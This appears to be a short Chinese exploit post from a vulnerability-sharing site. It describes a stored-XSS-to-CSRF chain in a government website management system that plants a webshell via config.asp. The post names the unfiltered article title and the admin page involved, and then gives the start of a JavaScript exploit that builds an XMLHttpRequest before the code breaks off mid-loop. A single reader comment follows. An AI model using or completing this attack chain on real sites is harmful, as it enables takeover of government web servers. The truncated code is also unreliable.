广州网域高科政府网站管理系统csrf getshell

漏洞分析 前台发表文章处未过滤xss标签,管理员后台http://0day5.com/CheckNews1.asp时对标题未过滤,可以xss攻击,结合系统配置处的config.asp 插马,可以 csrf getshell。 攻击流程,如图 1 exploit: [php] var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i

1 条评论

  1. Mantra

    :lol:

发表评论